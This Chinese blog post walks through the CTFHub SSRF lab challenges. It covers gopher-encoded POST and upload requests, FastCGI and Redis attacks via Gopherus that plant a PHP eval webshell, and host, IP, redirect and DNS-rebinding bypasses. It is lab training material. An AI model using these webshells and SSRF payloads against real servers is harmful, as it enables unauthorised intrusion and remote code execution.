首页 > 其他分享 >CTFHub-SSRF解析合集

CTFHub-SSRF解析合集

时间:2024-07-24 22:53:57浏览次数:12  
标签:127.0 SSRF CTFHub 0.1 flag 木马 靶场 php 合集

内网访问

直接使用 http:// 访问内网获取flag数据

伪协议读取文件

使用 file://绝对路径 读取flag.php数据,需要查看网页源代码

使用 file://绝对路径 读取flag.php数据,需要查看网页源代码

端口扫描

1.打开靶场后访问随机一个端口,抓包

2.将抓到的包发送到攻击模块,选择攻击的参数并修改设置,

注:本题提示端口范围在8000到9000

以修改请求间隔或少量多次的爆破,防止脆弱的靶场崩溃

3.爆破完后点击按长度排列,寻找长度不同的数据包,得知端口号后访问获取flag

post提交

1.寻找注入点

2.访问源代码

3.输入 key 抓包

4.删除无用数据,并修改host为127.0.0.1,复制并编码

5.将%0A替换为%0D%0A,末尾添加%0D%0A,代表数据包结束

6.二次编码

7.返回靶场在 ?url= 后访问添加 gopher://127.0.0.1:80/_二次编码后的数据包,获取ctf

上传文件

1.访问本地的flag.php

2.发现只有选择文件,需要自己添加提交按钮

<input type="file" name="file">

3.选择并提交文件,抓包

4.出现乱码,发送到重放器,删除几个乱码,查看字节长度是否改变,若改变,则正常使用

5.删除无用数据,修改host为 127.0.0.1 ,并将剩余数据进行编码

6.将编码后的数据中的%0A切换为%0D%0A,并在末尾添加%0D%0A代表数据包结束

7.将替换后的数据二次编码

8.使用 gopher://127.0.0.1:80/_二次编码数据 获取flag

FastCGI 协议

1.打开靶场和kali,在kali上打开 Gopherus-master 工具运行, 由于题目为 fastcgi 协议,所以指定 fastcgi, 提交一个靶场内的php文件地址,建议为默认的 index.php ,输入一句话木马,生成payload

运行代码: python2 gopherus.py --exploit fastcgi

地址: /var/www/html/index.php

一句话木马: <?php @eval($_POST['cmd']);?>

# base64编码后

echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > shell.php

2.将获取的 payload 编码

3.将编码后的数据输入到靶场,注入木马,并检查是否成功

注:未报错,添加成功

4.使用中国菜刀工具查询ctf

右键添加

Redis 协议

1.打开靶场和kali,在kali上打开 Gopherus-master 工具运行, 由于题目为 fastcgi 协议,所以指定 fastcgi, 提交一个靶场内的php文件地址,建议为默认的 index.php ,输入一句话木马,生成payload

运行代码: python2 gopherus.py --exploit redis

地址: /var/www/html/index.php

一句话木马: <?php @eval($_POST['cmd']);?>

2.将获取的 payload 编码

3.将编码后的数据输入到靶场,注入木马,并检查是否成功

虽然一直处于加载状态,但木马已经植入

注:未报错,添加成功

4.使用中国菜刀工具查询ctf

右键添加

URL BYpass

正常搜索应该为http://127.0.0.1/flag.php,但本题要求必须以 http://notfound.ctfhub.com 开头,所以结合起来为 ?url=http://notfound.ctfhub.com/127.0.0.1/flag.php 显然无法访问成功,所以可以将127前的 / 换为@ ,?url=http://[email protected]/flag.php,这样就可以将网址解析为以notfound.ctfhub.com的账户去访问127.0.0.1/flag.php

访问成功,获得flag

数字 IP BYpass

1.按流程访问,发现网站将127与172都屏蔽了.

2.此处有两种解决方案

  1. 将127.0.0.1替换为十六进制-->7F000001

注: . 转换为0,其他数字正常转换,最后拼接到一起

在十六进制前加0x可将十六进制解析为十进制

  1. 使用localhost替换127.0.0.1

302 跳转 BYpass

本题与上一题基本一致,上一题是将127和172屏蔽了无法使用,本题是添加了302跳转协议,一旦接收到IP地址就会跳转,也相当于变相禁用了127与172,故解法遇上题一样有两种,转换十六进制与使用 localhost

DNS 重绑定 BYpass

本题需要使用 DNS 重绑定,使用在线 DNS 重绑定网站获取重绑定代码,替换127.0.0.1,即可获得flag

https://lock.cmpxchg8b.com/rebinder.html

标签:127.0,SSRF,CTFHub,0.1,flag,木马,靶场,php,合集
From: https://blog.csdn.net/l_OMl_l/article/details/140672395

相关文章

  • 智慧油气合集 | 图扑数字孪生实现全生命周期管理
    石油和天然气在当今社会中扮演着不可替代的角色,虽然面临着环保和资源可持续性的挑战,但在现阶段仍然是全球能源体系中的核心组成部分。石油和天然气行业一直是技术创新的驱动者,带动了勘探、开采、处理和运输等方面的技术进步。效果展示图扑软件运用自主研发HTforWeb产品,打造......
  • 【专题】2024AI人工智能体验营销行业研究报告合集PDF分享(附原数据表)
    原文链接:https://tecdat.cn/?p=37084原文出处:拓端数据部落公众号 随着体验经济与智能新时代的双重浪潮席卷而来,既有的传统营销框架与初始体验营销理念逐渐显露出对快速膨胀的数字化生态及企业多元化需求的适应性不足。在此背景下,构建一个契合数智化时代脉搏的全新营销理论体系......
  • 力扣题库合集(2):动态规划(1)
      本文将持续更新~~ hellohello~,这里是绝命Coding——老白~......
  • 分享遇到的异步问题合集
    1.异步传输文件,解析时报错文件未找到场景:异步上传excel文件并需要解析时,在执行到代码中使用流时报错文件未找到原因:因为解析文件的时候并没有存到本地而是作为临时文件在内存中解析,使用异步立即返回的时候,也把临时文件删除了,所以使用流的时候,他找不到流对应路径下的文......
  • 最大矩形(水题)合集???
    前言刷水题,被水题刷。。。悬线法要比单调栈好写的多。P1387最大正方形悬线法#include<bits/stdc++.h>usingnamespacestd;constintN=105;intn,m,a[N][N],l[N][N],r[N][N],up[N][N],ans;intmain(){ scanf("%d%d",&n,&m); for(inti=1;i<=n;i++) for(intj=1......
  • Vue常用组件安装命令合集
    qs是一个流行的查询参数序列化和解析库。可以将一个普通的object序列化成一个查询字符串,或者反过来将一个查询字符串解析成一个object,帮助我们查询字符串解析和序列化字符串。npminstallqsnpminstallaxios-Selementuiui组件库npmielement-ui-Snpmielement-ui@2......
  • 【视频讲解】PCA主成分分析原理及R语言2实例合集|附代码数据
    原文链接:https://tecdat.cn/?p=37034原文出处:拓端数据部落公众号 分析师:RuoyiXu在数据分析的浩瀚宇宙中,我们时常面对多变量的数据海洋。这些变量虽然信息丰富,却也给处理带来了巨大挑战:工作量激增,而关键信息却可能淹没在繁杂的数据之中。为了有效减少指标数量同时尽可能保留原......
  • 郑州轻工业大学zzulioj1071~1090合集
    郑州轻工业大学zzulioj1071~1090合集本人小趴菜一颗,写博客是为了监督自己的学习以及分享学习资源给需要的人,欢迎大家评论区指出问题。同时由于本人比较懒,注释就不再写了,当然一些自己经常犯迷糊的地方还是会标注的,大家有什么问题也可以指出来,大家一起学习进步。郑州轻......
  • 【专题】2024年中国AIGC行业应用价值研究报告合集PDF分享(附原数据表)
    原文链接:https://tecdat.cn/?p=36570原文出处:拓端数据部落公众号大模型的发展标志着AIGC时代的来临,没有大模型支撑的AI已成为旧时代产物,缺乏竞争力。技术的突破始终是AI发展的关键,而商业应用则是推动其迅速发展的加速器。AI的持久繁荣依赖于其商业化的成功。展望2024年,我们有......
  • 调试合集(内含VS快捷键)
    目录一、BUG二、调试什么是调试?调试过程调试工具和技术三、VS常用快捷键四、VS中的常用调试功能(附快捷键)监视窗口自动窗口和局部变量内存窗口调用堆栈五、Debug实例求n的阶乘之和一、BUG在当今互联网盛行的时代无论你是否从事IT相关的行业或者学习,都应该听说过bug......